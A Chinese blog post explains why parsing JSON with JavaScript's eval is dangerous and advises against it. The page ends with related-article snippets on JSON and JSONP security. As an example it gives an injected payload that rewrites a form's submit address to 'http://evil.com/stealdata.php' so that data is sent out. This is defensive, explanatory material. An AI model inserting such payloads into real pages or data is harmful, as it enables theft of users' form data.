JSON数据的安全性,避免使用eval

最新推荐文章于 2023-02-08 18:59:29 发布
最新推荐文章于 2023-02-08 18:59:29 发布
阅读量4.7k 收藏 3
点赞数 1
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Dijason/article/details/8715128
版权

JSON(javascript object notation)可以说是XML的替代品,也是一种数据格式,但JSON更加简单简洁。

我们时常会想把JSON的字符串形式转换成对象,而js提供的eval函数可以帮我们完成这个工作。

var testJson = “{"name": "test", "age": 30}”;

var jsonVal = eval(testJson);   //{"name": "test", "age": 30}

alert(jsonVal.age);  //30

这是因为eval是一个能够解析js代码的函数。所以如果有人恶意在JSON的数据中插入恶意代码,比如修改表单提交的地址。

[ 1, 2, (function(){                  
    document.forms[0].action = “http://evil.com/stealdata.php”;                   
})(), 3, 4]  

用eval解析JSON数据时,上面的函数会被执行。

[ 1, 2, (function(){                  

   alert("hacked!!!");
})(), 3, 4]  

用eval会输出hacked!!!。

这里只是举了一个简单的例子,只是想说,用eval函数来解析JSON数据存在很大的安全性问题,最好避免这么做。就算要这么做,那么在之前需要进行过滤!


Dijason
关注
专栏目录
259-数据明文传输的安全问题
Edward_LF的博客
05-21 1153
数据明文传输的安全问题 在集群聊天服务器项目上,是明文的交互,采用的是Json做序列化和反序列化,从登录,注册的基本的业务开始,和后端的服务的交互,全都是明文的交互,相当于在浏览器上去访问web后端是用的https协议,数据确实是非常的不安全; 所以我们可以通过加密,传输之前要进行加密,对端接收之后要进行解密。 真真正正的项目,客户端和服务器通信:加密算法。用的是对称和非对称的混合加密。 1、数据的加密解密 1.1、对称加密算法 客户端client要给服务器server发送消息,client有一个密钥
ThinkPHP中使用ajax接收json数据的方法
10-25
在开发Web应用时,数据交互是必不可少的一部分,尤其是在前后端分离的架构中。ThinkPHP作为一个流行...在实际开发中,还要注意安全性问题,例如避免使用`eval()`,而是使用更安全的JSON.parse()方法来解析JSON字符串。
Json安全
weixin_30840253的博客
02-01 177
1.不要使用顶级JSON数组,避免被<script>标签引用。 2.使用POST+密钥获取JSON,尽量不要用GET方式。 3.不要使用eval()将对象放入内存,eval()会执行所传入的字符串,使用JSON.parse()就可以避免这个问题。 4.将JSON值中的html字符转码,防范在JSON使用html带来的安全问题。 转载于:https://www.cnblogs.c...
eval解析JSON中的注意点
Carter的菜园子
07-07 894
在JS中将JSON的字符串解析成JSON数据格式,一般有两种方式:1.一种为使用eval()函数。2. 使用Function对象来进行返回解析。使用eval函数来解析,并且使用jquery的each方法来遍历用jquery解析JSON数据的方法,作为jquery异步请求的传输对象
JSON并没有人们想象中的那样安全
精致-简洁-唯美
12-21 394
作者:Joe Walker 我最近看到过一些有关把JSON用于保密数据的讨论,而且我也不是很清楚有多少人了解其中的风险。 我个人认为JSON只能用于可公开的数据,其他数据都不能使用JSON,除非你使用的是无法预测的URL。 这里有两个问题。一个是CSRF(Cross Site Request Forgery,跨站点伪造请求攻击),它允许攻击者绕过基于cookie的身份认证,前些天我曾在Blog...
[翻译]JSON并没有人们想象中的那样安全(转)
weixin_30656145的博客
04-12 90
[翻译]JSON并没有人们想象中的那样安全原文:http://getahead.org/blog/joe/2007/03/05/json_is_not_as_safe_as_people_think_it_is.html作者:Joe Walker译者:Tony Qu我最近看到过一些有关把JSON用于保密数据的讨论,而且我也不是很清楚有多少人了解其中的风险。我个人认为JSON只能用于可公开的数据,其...
js使用eval解析json实例与注意事项分享
10-26
在JavaScript编程中,eval函数是一个非常强大的内置函数,它能够执行一段字符串...如果你在处理JSON数据时仍然选择使用eval,那么一定要记住将JSON字符串用"()"包起来,并且一定要确保数据安全性避免执行恶意代码。
Json对象和字符串互相转换json数据拼接和JSON使用方式详细介绍(小结)
11-30
JSON,全称JavaScript Object Notation,是一种轻量级的数据交换格式,广泛应用于现代Web应用...正确地使用JSON.parse()和JSON.stringify()方法,可以确保数据安全性和正确性,而对JSON的熟悉也有助于提高开发效率。
JS使用eval解析JSON的注意事项分析
11-23
在JavaScript中,解析JSON数据通常涉及两种主要方法:使用`eval()`函数和使用`JSON.parse()`(在现代浏览器中)。本文主要关注使用`eval()`解析JSON的注意事项,尤其是在结合jQuery进行异步请求的情况下。 首先,让...
Ajax中使用JSON传输数据
03-06
在Web开发中,Ajax(Asynchronous JavaScript and XML)技术被广泛用于实现页面的无刷新更新,提高用户体验。...在实际开发中,还需要注意安全问题,如避免XSS和CSRF攻击,以及优化网络传输性能,如使用GZIP压缩等。
JSONP使用以及需要注意的安全问题
netyeaxi的专栏
04-08 2075
JSONP 全称是 JSON with Padding,JSONP可能会引起CSRF(Cross-site request forgery 跨站请求伪造)攻击或XSS (Cross Site Scripting 跨站脚本攻击)漏洞对于支持JSONP的接口,写接口时数据可能会被篡改,读接口时数据可能会被劫持CSRF:这个问题属于CSRF攻击范畴,一个典型的 JSON Hijacking 攻击代码:&...
JSONP安全性分析
winnerX的专栏
06-20 790
1、主要是callback参数有没有进行适当的处理,否则会造成XSS漏洞,结合CSRF可以获取信息。比方说参数为callback=alert(1);truecallback,需要服务器B进行请求过滤转码。 2、http://zone.wooyun.org/content/16309 这段代码的大致意思就是假设黑客发给C一个html文件或者一个网址,C打开以后,这个恶意链接中的js代码会执行,会
eval解析JSON字符串的一个小问题
weixin_34074740的博客
02-20 174
之前写过一篇 关于 JSON 的介绍文章,里面谈到了 JSON 的解析。我们都知道,高级浏览器可以用 JSON.parse() API 将一个 JSON 字符串解析成 JSON 数据,稍微欠妥点的做法,我们可以用eval() 函数。 var str = '{"name": "hanzichi", "age": 10}'; var obj = eval('(' + str + ')'); conso...
转:使用eval()解析JSON格式字符串应注意的问题
weixin_30647065的博客
04-02 174
使用eval()解析JSON格式字符串应注意的问题 在利用javascript内置的eval函数,将json格式的字符串转换成JS对象时,需要用一对"()"先将该字符串包住. 例如: 将varstrTest="{id:\"cnlei\",url:\"http://www.cnlei.com\"}";转换成JS对象 正确写法: varobjTEST=eval("("+str...
细说JavaScript中的eval()不安全
weixin_34245749的博客
04-27 2750
细说JavaScript中的eval()不安全,eval()安全问题就在于它能把传入的字符串当做javascript代码执行。有的人可以在eval()里注入字符串,比如你要传入一个数组,有人可以改[1,2,function(){开始修改}],本来该传预期的数组,但是这里却有匿名函数。通过eval由javascript解析执行后,匿名函数被执行。你该知道后果,比如可以通过它修改...
【6】基础知识类---eval函数及其安全性问题
shlleylu的博客
10-30 1367
eval()函数及其安全性问题 1.主要用途 a. 类型转换:字符串转为列表、字典、元组 b. 做计算器使用 # 举例1:类型转换:字符串转为列表、字典、元组 mylist = '[1,2,3,4,[5,6,7,8,9]]' mydict = "{'a':123,'b':456,'c':789}" mytuple = '([1,3,5],[5,6,7,8,9],[123,456,789])'...
python中eval函数的使用安全性问题
zoulonglong的博客
05-25 8895
Python有很多内置的很有用的工具函数,结合Python的强大的第三方库,熟练的运用这些内置工具有助于事半功倍,之前写工具遇到eval()函数,发现这个函数非常好用,但是慢慢后来通过网上的资料知道eval这个函数其实有利也有弊,函数涉及到一些安全问题,下面就对eval函数的使用和涉及到的安全问题进行讲解。eval函数的定义:eval()官方文档里面给出来的功能解释是:将字符串string对象转化...
前端也需要了解的 JSONP 安全
最新发布
qq_53058639的博客
02-08 91
What?你还不知道 JSONP 是什么?赶紧去补补吧,我就不多讲了。补个百度百科链接先,绕来绕去,总感觉用的不太爽,可能正是由于 jsonp 的种种缺陷,才一直没有被浏览器标准采纳吧。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值